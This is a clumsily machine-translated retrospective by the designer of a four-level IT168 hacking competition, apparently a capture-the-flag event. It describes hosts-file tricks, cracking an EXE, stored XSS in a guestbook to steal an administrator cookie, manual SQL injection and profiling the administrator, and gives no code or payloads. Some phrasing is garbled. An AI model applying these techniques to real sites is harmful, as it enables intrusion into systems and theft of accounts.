Summary of designers of the IT168 security technology competition for the New Year

Author: emptiness

[IT168] All the technologies used in the entire game level are relatively basic. As long as you have your own ideas and understand basic hacker technology, it is easy to pass through the competition by taking some time. The overall design idea is: requires the pass-through personnel to use their own real technology, without using fully automated tools, familiar with basic web hacker attack technology, and willing to brainstorm. The level should be as practical as possible, and the technology should not be repeated as much as possible. At the beginning of the level, it is expected that the host file will be used to block some people, so that those who are impatient and unwilling to brainstorm should first stay awake and come back for a while.

The entrance of this competition is: http://www.ixpub.net/thread-892412-1-1.html

The purpose of this competition is to first block cainiao from the door, so that more technical people can receive rewards and share their attack and defense experience with laruence. After learning these experiences, cainiao will be able to use them in subsequent "checkpoints. The brightest part of hacking games is how they are finally cracked.

In fact, sometimes a question is very difficult to come out of. It requires real technology and cannot be separated from reality. This is the difficulty of the level design. For example, if I have a meaningless question and an administrator password that allows you to run on a rainbow table for one or two days, is it very practical? In our daily life, we may often encounter such a problem. Unfortunately, it is a waste of your time and national power resources, but it does not reflect the real technology. Therefore, selecting a question is the most important and the most difficult step. The final checkpoints I set are all very selective.

Level 1: host file + simple cracking

Note that observation is the foundation that every security personnel must possess. Even more important than many technologies, it is worth pondering. This is a part of the game. Every sentence in the author's game description is not written in white. There are many keys or even the "final pass". 7J (first place in the competition) has suffered a big loss here. Here is the original saying: "After testing, each Customs address can be accessed normally .", It seems absolutely nonsense, but it reminds me in disguise that "the level is okay. You cannot access it. It's your business. Please try your best to access it !". As a result, many smart people thought about the host file.

Changed the host file, and the page shown here allows you to download an EXE and crack it. Why add this? In fact, it is in disguise to remind everyone: "Do you see it? All of them are simple technologies. Even prize winning projects that are usually used in the level are the basis ". Don't take a look At pediy tutorials, open OD, select to search for all strings, and you will see the password. This is called a "slightly basic" attack. After the password is obtained, the address of level 2 is displayed. I still can't access it, but with the big pitfall of the first level, it's no longer a problem.

In the "Daily Life" of the application, I don't know whether you have thought about it. Many servers have hidden checkpoints. When we find that there is a station but we cannot access it, have you ever thought about modifying the host file? Maybe the Administrator has neglected. The domain name expires and the server's website is still there. Modifying the host file can even crack some network verification.

Level 2: Break through the message book

In many websites, there are more or less message book functions. If we do this, there may be a lot of gains here. As soon as I saw the message book, many of my friends knew the theme of this issue-XSS. In general, there are a few websites in the message book. The specific reason is that there are too few functions. It is not ruled out that some databases end with ASP and can just write a sentence, but in this game, you don't want to start with shell, because the stage environment is complicated, there are other sites on the server. I must ensure that you cannot get the shell. Of course, I will not disclose it again next time.

XSS is already an indispensable technology in attacks. In many cases, you can directly use shell. Therefore, hackers are also indispensable in the game. However, there are high-level and low-level features. In order to take care of everyone, I also specifically found a message book without any XSS filtering (it will not be so easy next time ). At the same time, I also set up a virtual machine on my own machine. Every morning and evening, I used my administrator to read my post. Interaction. This is a standard interaction. Many XSS users have succeeded, so they can see the changes in the cookie after logging on to the Administrator. Enter the third-level address.

You know, for the normal operation of the level, I will come up every morning and evening to act with everyone, read and delete posts. To ensure the operation of the function, a special asp page is written to restore the post and administrator password. Of course this is a very long path. After that, the real game just started.

Level 3: manual SQL Injection

Q: How can I ensure that only manual injection is supported by the current SQL tool?

This is the difference between humans and machines.

This is a special requirement and there will be no tutorials on the Internet. They are all thinking about how to prevent SQL injection attacks, while I am thinking, how to bypass automatic scanning of tools while allowing manual SQL injection attacks.

Finally, I decided a method called conversion. After receiving the characters entered by the user, analyze the fields and convert the SQL Injection keywords. A Conversion list is provided for comparison during manual injection. I didn't see the Conversion Function written in JS. Later, I saw that the official prizes were not as brilliant as they were before. I was worried that the difficulty was too high and it would affect the passion for passing through the Customs, to take care of the big family, specifically added a conversion function.

In fact, the difficulty is really not high. One statement obtains the mdb address, and the other statement cross-database. Table names and field names are also the most common.

SQL injection is the absolute king of web attacks. Its appearance can even change the era of attacks. I think it would be hard to predict whether SQL injection can be put on the urgent agenda of various websites if it is not a tool. If there is no relevant Foundation, The cainiao will only use tools at ordinary times and will surely be stuck at this level.

I didn't plan to get stuck with this TNT before injection, just to let everyone not forget that there is another technology in the dark.

Level 4: The Administrator

Q: What is the most important penetration point of an enterprise, regardless of its size?

There is no doubt that the Administrator is at this point. Even a secure system and a secure program cannot handle the attacks of the idiot administrators. They are the real "hackers ".

An experienced penetration expert, an important level designer in the early stage, once said that to build a station, the most important thing is the administrator. No matter what method we want, the final finger points to him. In other words, if you have been on the site for half a day and you don't even know who the Administrator is, it only means that you are a novice cainiao.

The first thing I can see is the latest version of the Forum. To ensure that you don't get the shell, I have been stunned by all functional pages that involve FSO. I saw 7J say "0-day" on the forum. I personally think this guy is playing the show, but it's me. If there is 0-day, it won't be used to play this level. I know this level clearly, is under absolute monitoring. The server is running wareshark, and you dare to throw it. I absolutely have a perfect recording. The guy with a 0-day attack on j8hacker was caught by me and captured the whole process perfectly.

Without 0-Day, it is obvious that there is only one path. Start with the Administrator. I believe everyone has had the painful experience of guessing the password. Is this password generally unavailable to social workers, because I have no intention of letting them work. What should I do for the last time? After careful comparison, what is the difference between a brand-new forum and a level? Isn't it the Administrator's mailbox?

However, this requires an extreme Lenovo logic (Inertial thinking). From the perspective of level 1, 2, and 3, the designers of the level obviously have no money. The poor ones can only use the host file to complete the level design. The user name in the mailbox is similar to this address. Isn't there any xuanjicang in it? In fact, as long as you bind the domain name of this user name again to access the level, you can see the second off of Level 4. The enterprise website that follows will naturally come out with a password. All this happens to the Administrator's information. As long as you carefully observe the administrator, you will get a lot of useful things.

Use the password of 2 sub-Customs to go back to 1 sub-customs of 4, and log on to the background, which is the role of 2 sub-customs. What else can I do if all other functions are deleted? It is worth mentioning that this level is not the same as the previous level. There is an obvious prompt to pass through the page, indicating that the background is not complete. Speaking of this, I am very disappointed that I have already indicated so clearly on the pass instructions. Please contact the Administrator QQ. Why is there so many people who are at the door? Haha, this is actually a text game, deliberately. -_-! I thought that the Administrator QQ came with the mobile network, right?

I can see that everyone is not close. As long as I act as a good person, I go to the Forum to post and keep reminding me. In the past, JavaScript-related hacking games, we all know that there will be "word games". How come we forget this? Divergent thinking and jumping thinking are useful tools no matter where they are used.

In conclusion, have you mastered the technologies mentioned in this game? That's good! Wait for the next level!